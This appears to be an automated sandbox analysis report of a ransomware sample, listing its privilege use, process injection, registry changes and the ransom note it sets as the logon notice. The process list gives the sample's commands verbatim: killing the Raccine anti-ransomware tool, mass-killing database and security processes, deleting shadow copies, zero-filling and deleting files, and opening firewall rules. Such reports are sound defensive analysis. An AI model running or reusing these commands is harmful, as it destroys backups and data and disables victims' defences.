N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 860 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 192 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 860 wrote to memory of 192 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 860 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 860 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 860 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\schtasks.exe
PID 860 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\schtasks.exe
PID 860 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\netsh.exe
PID 860 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\netsh.exe
PID 860 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 860 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\System32\Conhost.exe
PID 860 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\System32\Conhost.exe
PID 860 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\System32\Conhost.exe
PID 860 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\System32\Conhost.exe
PID 860 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe
PID 860 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\SYSTEM32\taskkill.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe"

C:\Windows\SYSTEM32\taskkill.exe

"taskkill" /F /IM RaccineSettings.exe

C:\Windows\SYSTEM32\reg.exe

"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F

C:\Windows\SYSTEM32\reg.exe

"reg" delete HKCU\Software\Raccine /F

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /DELETE /TN "Raccine Rules Updater" /F

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config Dnscache start= auto

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config FDResPub start= auto

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SSDPSRV start= auto

C:\Windows\SYSTEM32\netsh.exe

"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config upnphost start= auto

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM synctime.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM Ntrtscan.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqbcoreservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM isqlplussvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM firefoxconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM encsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM onenote.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tbirdconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM agntsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM excel.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM PccNTMon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbeng50.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM CNTAoSMgr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat64.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msaccess.exe /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlwriter.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM steam.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM outlook.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocomm.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tmlisten.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" IM thunderbird.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM wordpad.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbsnmp.exe /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM infopath.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msftesql.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-opt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM xfssvccon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mbamtray.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM powerpnt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocautoupds.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM zoolz.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocssd.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM visio.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM oracle.exe /F

C:\Windows\SYSTEM32\netsh.exe

"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlagent.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlbrowser.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM winword.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlservr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-nt.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }

C:\Windows\SYSTEM32\arp.exe

"arp" -a

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

Network

Files

memory/860-114-0x00000000002C0000-0x00000000002C1000-memory.dmp

memory/860-116-0x000000001AFB0000-0x000000001AFB2000-memory.dmp

memory/2624-117-0x0000000000000000-mapping.dmp

memory/192-118-0x0000000000000000-mapping.dmp

memory/764-119-0x0000000000000000-mapping.dmp

memory/3592-120-0x0000000000000000-mapping.dmp

